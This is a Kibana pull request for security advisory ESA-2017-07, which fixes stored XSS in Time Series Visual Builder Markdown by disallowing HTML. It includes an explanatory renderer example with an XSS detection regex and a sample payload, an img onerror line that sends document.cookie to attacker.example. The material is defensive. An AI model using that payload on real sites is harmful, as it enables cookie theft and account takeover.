
ESA-2017-07 Remove HTML support from Markdown for Time Series Visual Builder #11770

Merged
merged 3 commits into from May 15, 2017

5 participants
@simianhacker
Member

commented May 12, 2017

The time series visual builder that was released in 5.4.0 is vulnerable to a cross-site scripting attack (XSS), where a malicious user could embed HTML into markdown documents that could result in JavaScript being executed in other users' browsers. This could be abused to steal sensitive information or to perform destructive actions on behalf of other users. 5.4.1 fixes this vulnerability by no longer allowing HTML in markdown documents.


This PR removes the HTML support for Markdown in Time Series Visual Builder to be consistent with the Markdown behavior elsewhere in Kibana.

CC: @epixa
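The class of bug described in the PR text above, as an added example that is not Kibana's code and does not use the Markdown library TSVB actually uses: a minimal Markdown renderer with one `allowHtml` switch, beside a check that a test or reviewer can run over rendered output. The renderer, its `allowHtml` option, `containsActiveContent`, and the sample panel text `HOSTILE_MARKDOWN` are all constructed here for illustration.

```javascript
// Added example, not Kibana code. A tiny markdown-to-HTML renderer that
// supports only headings, bold and emphasis; the point is what happens to
// raw HTML in the input when `allowHtml` is on (the vulnerable behaviour)
// versus off (the fix: HTML-significant characters are escaped).

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

function renderInline(text, allowHtml) {
  // With allowHtml the author's text reaches the output untouched, so any
  // tag they typed becomes a live element in every viewer's browser.
  const safe = allowHtml ? text : escapeHtml(text);
  return safe
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>');
}

function renderMarkdown(markdown, { allowHtml = false } = {}) {
  const blocks = markdown.split(/\n{2,}/).map((b) => b.trim()).filter(Boolean);
  return blocks
    .map((block) => {
      const heading = /^(#{1,6})\s+(.*)$/.exec(block);
      if (heading) {
        const level = heading[1].length;
        return `<h${level}>${renderInline(heading[2], allowHtml)}</h${level}>`;
      }
      return `<p>${renderInline(block, allowHtml)}</p>`;
    })
    .join('\n');
}

// Check for script-capable markup surviving in rendered HTML: script-like
// elements, inline event handlers on any element, or javascript: URLs in
// href/src. Only literal '<' starts a match, so escaped text is not flagged.
const ACTIVE_CONTENT =
  /<(?:script|iframe|object|embed)\b|<[a-z][^>]*\son[a-z]+\s*=|<[a-z][^>]*\b(?:href|src)\s*=\s*["']?\s*javascript:/i;

function containsActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

// Constructed sample of what a malicious user could save into a markdown panel.
const HOSTILE_MARKDOWN = [
  '# Latency **p99**',
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
].join('\n\n');

// Vulnerable rendering: the <img onerror=...> element is emitted as markup.
const vulnerable = renderMarkdown(HOSTILE_MARKDOWN, { allowHtml: true });
// Hardened rendering: the same input is shown to the viewer as inert text.
const hardened = renderMarkdown(HOSTILE_MARKDOWN, { allowHtml: false });
```

The check is deliberately a regex over serialized HTML, which is fine for a unit test on a renderer's output but is not a substitute for escaping or for a real sanitizer in front of the DOM; the fix in this PR is the escaping branch, not the detector.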

@rashidkpc

Member

commented May 12, 2017

LGTM. Wait for the tests and merge it.

@simianhacker

Member Author

commented May 12, 2017

Jenkins test this

@s1monw


commented May 15, 2017

LGTM 2 and that means a lot!

@epixa

Member

commented May 15, 2017

This test failure is unrelated, I'm going to get this change in.

@epixa epixa merged commit 8b31d55 into elastic:master May 15, 2017

1 of 2 checks passed

kibana-ci: Build finished.
CLA: Commit author has signed the CLA.

epixa added a commit that referenced this pull request May 15, 2017

epixa added a commit that referenced this pull request May 15, 2017

@epixa

Member

commented May 15, 2017

5.x 6413a86
5.4 913ee1f

@rasroh

Contributor

commented May 15, 2017

Verified this on the latest build (BC3 of 5.4.1) and HTML code does not render as expected in Markdown - TSVB.

@epixa epixa changed the title Remove HTML support from Markdown for Time Series Visual Builder ESA-2017-07 Remove HTML support from Markdown for Time Series Visual Builder Jun 1, 2017

@epixa epixa added the v6.0.0-alpha2 label Jun 2, 2017
